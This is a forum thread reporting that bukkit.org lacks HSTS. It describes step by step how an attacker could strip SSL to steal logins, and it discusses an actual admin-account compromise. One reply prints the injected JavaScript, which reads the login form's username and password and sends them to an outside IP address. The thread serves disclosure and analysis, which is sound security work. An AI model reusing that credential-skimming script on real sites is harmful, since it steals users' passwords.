Problem/Bug No HSTS for bukkit.org

Discussion in 'Forum Feedback' started by lol768, Dec 9, 2015.

Thread Status:
Not open for further replies.
  1. Offline

    lol768

    1. User types 'bukkit.org' into their browser address bar and hits enter whilst at a conference on an open WiFi network. They've visited the site before in the past and now that it uses SSL everything should be okay, right?
    2. Attacker intercepts HTTP request on port 80. Normally the response would be something like:
      HTTP/1.1 301 Moved Permanently
      Date: Wed, 09 Dec 2015 10:59:25 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      Location: https://bukkit.org/
      Server: cloudflare-nginx
    3. Attacker connects to https://bukkit.org/ on the victim's behalf, swallows the redirect response and serves all the secure pages back to the victim on port 80.
    4. Victim logs into the forums, inadvertently sends the password to the attacker and has their session cookie compromised too.
    5. Victim happens to have admin access. Attacker uses this to inject malicious scripts into the page and compromise even more accounts.
    6. Eventually someone notices and notifies Curse. Maybe the script is removed after a few months, maybe the users are informed - it doesn't matter because at this point all of the passwords of those who've logged in have been compromised. A smarter script would forcibly log the user out and make them login again to harvest the passwords of everyone who visited.
     
    Last edited: Dec 9, 2015
    ferrybig likes this.
  2. Offline

    Lolmewn

    MITM ftw!
     
  3. This wouldn't happen to be a disappointing Minecraft themed convention hosted in London, would it?
     
    teej107 likes this.
  4. Offline

    teej107

    umm.......
    there was a recent bug where it wouldn't log you in. No matter how many times you "logged in", it wouldn't log you in.
    https://bukkit.org/threads/cant-login-with-ie11.391369/
     
  5. Offline

    Lolmewn

    @teej107 That was cookie related and may have had to do with the script (but I have no idea if it did).
     
  6. Offline

    teej107

    Yeah who knows :p The bug did seem to appear after the admin account got compromised.
     
  7. Offline

    Tecno_Wizard

    @teej107,
    @Lolmewn I looked at the script. All it did was listen for the form submission. I don't think it would have caused the cookie issue, but it is strange that the time frames match.

    EDIT: Here's the script from October 22
    Code:
    function authXen()
    {
    var xmlhttp = getXmlHttp();
    var user = encodeURI(document.getElementById("ctrl_pageLogin_login").value);
    var pass = encodeURI(document.getElementById("ctrl_pageLogin_password").value);
    var url = "/web/20151022200106/http://108.61.204.52/a.php?s=bukkit&u=";
    url = url.concat(user);
    url = url.concat("&p=");
    url = url.concat(pass);
    xmlhttp.open("GET", url);
    xmlhttp.send(null);
    }
     
    Last edited: Dec 28, 2015
  8. Offline

    lol768

    Ultimately we can't know what the script did, it could have served different code based on the user agent, location of the victim, time of day. It could've evolved, changed its purpose etc.
     
  9. Offline

    kelbiiz

    Thanks for information... :)
     
Thread Status:
Not open for further replies.

Share This Page